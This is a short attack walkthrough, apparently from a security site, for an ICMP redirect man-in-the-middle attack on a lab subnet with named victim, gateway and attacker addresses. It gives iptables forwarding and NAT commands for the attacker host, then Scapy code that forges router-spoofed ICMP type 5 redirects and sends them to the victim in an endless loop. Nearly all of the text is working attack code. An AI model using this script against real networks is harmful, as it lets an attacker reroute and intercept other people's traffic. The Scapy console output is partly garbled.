Enable IP forwarding and Source NAT translation for Victim subnet
#sudo echo 1 > /proc/sys/net/ipv4/ip_forward #sudo iptables -t nat -A POSTROUTING -s 10.100.13.0/255.255.255.0 -o tap0 -j MASQUERADE
#sudo iptables --append FORWARD --in-interface eth0 -j ACCEPT (only for traffic forward)#sudo iptables -t nat -L
- ip – gateway = 10.100.31.1
- ip – victim = 10.100.13.126
- ip – attacker = 10.100.13.20
- ip- victime website = 10.23.56.100
Scapy create ICMP-Redirect packet (type=5) for a better gateway to destination 10.23.56.100
>>> ip=IP() >>> ip.src='10.100.13.1' >>> ip.dst='10.100.13.126' >>> ip.display bound method IP.display of IP src=10.100.13.1 dst=10.100.13.126 |>> >>> icmp=ICMP() >>> icmp.type=5 >>> icmp.code=1 >>> icmp.gw='10.100.13.20' >>> icmp.display bound method ICMP.display of > >>> ip2=IP() >>> ip2.src='10.100.13.126' >>> ip2.dst='10.23.56.100' >>> ip2.display bound method IP.display of IP src=10.100.13.126 dst=10.23.56.100 |>>
# Creating and sending ICMP redirect packets originalRouterIP='10.100.13.1' attackerIP='10.100.13.20' victimIP='10.100.13.126' serverIP='10.23.56.100' # We create an ICMP Redirect packet ip=IP() ip.src=originalRouterIP ip.dst=victimIP icmpRedirect=ICMP() icmpRedirect.type=5 icmpRedirect.code=1 icmpRedirect.gw=attackerIP # The ICMP packet payload /should/ contain the original TCP SYN packet # sent from the victim Ip redirPayloadIP=IP() redirPayloadIP.src=victimIP redirPayloadIP.dst=serverIP fakeOriginalTCPSYN=TCP() fakeOriginalTCPSYN.flags="S" fakeOriginalTCPSYN.dport=80 fakeOriginalTCPSYN.seq=444444444 fakeOriginalTCPSYN.sport=55555 while True:send(ip/icmpRedirect/redirPayloadIP/fakeOriginalTCPSYN) # Press <enter>
RootSecurity 